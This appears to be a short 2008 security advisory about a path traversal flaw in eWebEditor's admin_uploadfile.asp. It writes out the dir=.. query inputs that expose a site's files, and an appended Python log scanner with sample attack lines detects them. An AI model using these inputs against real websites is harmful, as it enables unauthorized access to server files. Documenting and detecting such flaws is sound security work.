eWebEditor path traversal vulnerability - Vulnerability warning - The Black Bar Safety Net

2008-01-16T00:00:00
ID MYHACK58:62200818162
Type myhack58
Reporter Anonymous
Modified 2008-01-16T00:00:00

Description

eWebEditor description: eWebEditor is a WYSIWYG online editor. As the name suggests, it is used on the web in WYSIWYG editing mode for editing illustrated articles, news, discussion posts, circulars, notes and other word-processing content.

The filtering in ewebeditor/admin_uploadfile.asp is not strict, which results in a path traversal vulnerability.

Reference: http://www.sebug.net, http://www.ewebeditor.net/

Test method:

[Warning] The following procedures (methods) may be offensive in nature and are for security research and teaching purposes. Use at your own risk!

ewebeditor/admin_uploadfile.asp?id=14

After id=14, append &dir=.., then &dir=../.. and &dir=http://www.****.com/../.. to see the files of the entire website.

Recommendations: none

http://www.ewebeditor.net/
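Since the advisory lists no fix, one way to find requests of the kind described above in web server logs is sketched here as an added example; it is not part of the original advisory or of eWebEditor. The log field layout, the sample lines and the function names are constructed assumptions.

```python
from urllib.parse import parse_qsl, unquote

TARGET = "admin_uploadfile.asp"  # script named in the advisory

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so doubly encoded dots are seen as '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def dir_is_traversal(query):
    """True if any dir= value in the query string points outside the upload folder."""
    for name, raw in parse_qsl(query, keep_blank_values=True):
        if name.lower() != "dir":
            continue
        value = decode_fully(raw).replace("\\", "/")
        if ".." in value.split("/") or "://" in value or value.startswith("/"):
            return True
    return False

def scan(lines):
    """Return (client_ip, query) for every flagged request to TARGET."""
    hits = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        # Assumed layout: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
        stem, query, client = fields[3], fields[4], fields[5]
        if stem.lower().endswith("/" + TARGET) and dir_is_traversal(query):
            hits.append((client, query))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    "2008-01-16 10:00:01 GET /ewebeditor/admin_uploadfile.asp id=14 192.0.2.10 200",
    "2008-01-16 10:00:05 GET /ewebeditor/admin_uploadfile.asp id=14&dir=.. 198.51.100.7 200",
    "2008-01-16 10:00:09 GET /ewebeditor/admin_uploadfile.asp id=14&dir=%252e%252e%5C%252e%252e 198.51.100.7 200",
    "2008-01-16 10:00:12 GET /ewebeditor/admin_uploadfile.asp id=14&dir=2008/01 192.0.2.10 200",
    "2008-01-16 10:00:15 GET /index.asp dir=.. 203.0.113.4 200",
]

if __name__ == "__main__":
    for client, query in scan(SAMPLE_LOG):
        print(client, query)
```

The same segment check, applied to the dir value before it is joined to the upload folder, is the server-side filter the script lacks.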